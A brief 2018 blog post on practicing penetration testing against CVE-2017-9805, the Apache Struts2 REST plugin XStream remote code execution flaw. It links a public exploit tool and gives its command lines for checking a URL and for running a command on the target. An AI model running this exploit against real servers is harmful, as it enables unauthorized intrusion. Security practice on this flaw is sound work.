Sunday, December 23, 2018

CVE-2017-9805 - Apache Struts2 REST Plugin XStream RCE

I found this GitHub page extremely useful when practicing pen testing on CVE-2017-9805 - Apache Struts2 REST Plugin XStream RCE:


https://github.com/mazen160/struts-pwn_CVE-2017-9805

Check if the vulnerability exists against a single URL.

python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'

Exploit a single URL.

python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
